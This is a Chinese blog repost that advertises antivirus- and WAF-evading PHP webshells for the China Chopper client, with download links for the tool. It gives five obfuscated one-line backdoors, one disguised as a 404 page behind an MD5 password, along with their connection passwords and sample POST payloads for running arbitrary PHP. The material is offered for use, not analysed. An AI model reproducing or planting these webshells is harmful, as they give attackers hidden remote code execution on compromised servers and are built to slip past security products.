免杀的php webshell

转载自：http://blog.csdn.net/settoken/article/details/51581776
中国菜刀下载,基于原版中国菜刀优化版20160309.
下载地址:
http://download.csdn.net/detail/settoken/9457567
https://pan.baidu.com/s/1jHoJxHW
China chopper
https://pan.baidu.com/s/1eRxEYjC

特别推荐的一个PHP一句话.
菜刀可以连接,过waf,过安全狗,D盾,360,php一句话木马带404页面,带MD5加密,可浏览器POST任意php代码执行.
代码如下:

<?php   
echo "404 Not Found!</br>"; error_reporting(0);  
if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content));  
echo "We're sorry but the page your are looking for is Not Found..."  
?>  

使用优化版菜刀连接,使用方法如下.
菜刀配置填:com=settoken&content=ZXZhbCgkX1BPU1RbJ3BhZ2UnXSk7
连接密码:page
附上连接图片:

下面介绍使用浏览器POST提交执行任意php代码.
POST提交:com=1&&content=cGhwaW5mbygpOw== //phpinfo(); 执行是phpinfo

第一个:

<?php  $mt="mFsKCleRfU"; $ojj="IEBleldle"; $hsa="E9TVFsnd2VuJ10p"; $fnx="Ow=="; $zk = str_replace("d","","sdtdrd_redpdldadcde"); $ef = $zk("z", "", "zbazsze64_zdzeczodze"); $dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn"); $zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx))); $zvm(); ?>  

连接密码:wen 以上一句话,使用原版本优化的效果更好. 可以waf.

第二个:

<?php   
@$a = $_POST['x'];   
if(isset($a)){   
@preg_replace("/
(.∗)
/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));   
}   
?>  

连接密码:x

第三个:

<?php   
$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n985de9'];if(isset($s22)){eval($s21($s22));}?>  

菜刀配置填n985de9=QGV2YWwoJF9QT1NUWzBdKTs=
连接密码:0

第四个:

<?php $_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?>  

连接密码:1